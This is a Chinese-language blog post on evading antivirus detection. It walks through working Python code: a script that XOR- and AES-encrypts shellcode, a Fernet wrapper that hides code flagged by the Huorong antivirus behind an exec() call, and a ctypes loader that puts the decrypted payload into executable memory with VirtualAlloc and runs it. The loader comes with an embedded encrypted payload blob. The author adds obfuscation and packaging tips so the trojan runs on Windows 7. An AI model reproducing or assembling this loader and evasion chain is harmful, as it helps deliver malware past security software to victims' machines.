免杀学习-python代码分析缝合
分析下市面上的两个个工具,站在巨人的肩膀上
这是一个加密的脚本,可以将对应的数据XOR加密和AES加密,用于加密shellcode(bese64编码后的bin文件)
import base64
from Crypto.Cipher import AES
def add_to_16(s):
while len(s) % 16 != 0:
s += '\0'
return str.encode(s) # 返回bytes
def aes_jiami(text):
# 密钥长度必须为16、24或32位,分别对应AES-128、AES-192和AES-256
key = 'LeslieCheungKwok'
aes = AES.new(add_to_16(key), AES.MODE_ECB)
encrypted_text = str(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding='utf8').replace('\n', '')
return encrypted_text
def xor_jiami(s,key):
xor_s = ''
for i in s:
xor_s += chr(ord(i) ^ key)
return xor_s
if __name__=='__main__':
sc = 'shellcode'#读取shellcode
with open('./aes-xor.txt','w') as f:
f.write(aes_jiami(xor_jiami(sc,35)))
#用fernet加密代码的脚本
from cryptography.fernet import Fernet
#被火绒ban掉的代码
ban_code=[b'''
xxxxxxxxx
'''
]
for code in ban_code:
key =Fernet.generate_key()
f =Fernet(key)
enc_pay =f.encrypt(bytes(code))
output_key ="key= {0}".format(key)
print(output_key)
print("f_obj= Fernet(key)")
output_enc_pay ="enc_pay= {0}".format(enc_pay)
print(output_enc_pay)
print("exec(f_obj.decrypt(enc_pay))")
print("========================================")
Oxyry Python Obfuscator - The most reliable python obfuscator in the world
python代码混淆网址
#加载器
import base64
import ctypes
from Crypto.Cipher import AES
kernel32 = ctypes.windll.kernel32
def aes_jiemi(s):
cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB)
return cipher.decrypt(base64.decodebytes(bytes(s, encoding='utf8'))).rstrip(b'\0').decode("utf8")
def xor_jiemi(s,key):
xor_s = ''
for i in s:
xor_s += chr(ord(i) ^ key)
return xor_s
def write_memory(buf):
length = len(buf)
kernel32.VirtualAlloc.restype = ctypes.c_void_p
ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40)
kernel32.RtlMoveMemory.argtypes = (
ctypes.c_void_p,
ctypes.c_void_p,
ctypes.c_size_t)
kernel32.RtlMoveMemory(ptr, buf, length)
return ptr
def run(shellcode):
buf = ctypes.create_string_buffer(shellcode)
ptr = write_memory(buf)
shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
shell_func()
if __name__ == '__main__':
jiami_sc = 'nNTTwqBntRUVsGzFLXrB54mHCTMUkwOkgFGxbYPdb6zG2uKaUEKY4lK2dT36BaJQ9jZJ4rPVx5n0xGteS5M1f5r/hc9ab2ZAUcUipd/87CD/Vmns9lpZCaj8Cr1BXdsEpO56xJtpurJ9tbar8S+4VIX6cQ2bJefummMWD2tv8upIx8UtZigMvqryLrrQ6RN7Hab87ezQV9t9qtMBhKm2No3LA3mX/oYGWl88CBuMCqEEyntbFMKhbi8PXXDt+GvamHgmSlTPn+M54tLfoAbxy6L/MDId2TX+BrTjrbO53TNJODdgBl7Jn2SH2/ucg7VZpOoscbRSePFQo/+iCp4gqJn9h/alCY85EXuYti/14W7C41f0KSZfp0zPE5fI3lykyHWPVkZoX+LmdDg43pIybdaUgI/G1YLE9rK6o+9cBgr+BrQiehHpvl5Id8N6pKgilMIenPEwlCzEalny0uhKFVT6Kl9idOQZmds1kqLT0nyvem0lt+tffq3+a1ioGWGKybinrDOArR4P0GQrCjsoOAVWZlvuXceM7aZX1aGHEnfMNg7WQb1zfWRp3HCp1bKZ8IP+Fp3fKhpxNiHYAaGMqfBcZbIex1O6O6eg+xnNJ3TzOnQfhvfSMhtt3nzDe8OS5f1PtiMUUnOlXP8uYDlPDL6ZJxEIboziy9YdjsX0bM4A3FrDVlenTpK2wbWlOJnLEoxO7a6093Z6ILY3n201WNJR2bzvNFmBlRD0SvKPJpcB6nAR2pHjra27MNAqYq4oFingkte1G6UZBb2A3n3DyI2DgH9agOO1d4T1p0nYac4B2a/v+9NwmK1C4aQw1lOpqvQuyNS8OyFnGHZMmOkS+aYCR2bLc6vNrMVG7ys553D1mpKgi4vKvowXI/u0GoI/lSL9ehSAoMFaUdoieft2JpzVPRr1aF7JK5OAc6vnzLVASlnKCJb6Pj6MknFDJTruaW'
sc = xor_jiemi(aes_jiemi(jiami_sc),35)
shde = base64.b64decode(sc)
run(shde)
最后编译main就可
这套免杀就是base64+xor+aes最后代码混淆+fernet
最后我改了下里面的加密方式以及一些小东西,缝合了一套自己的免杀,源码我就在这不放了,免得用不了多久就没了。
最后说下踩的一个坑吧,win10打包的马在win7没法用怎么办,在win7装一个python32,然后在win7打包就行了,这样哪里都能运行,注意win7装python需要安装一个插件 KB976932补丁。
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。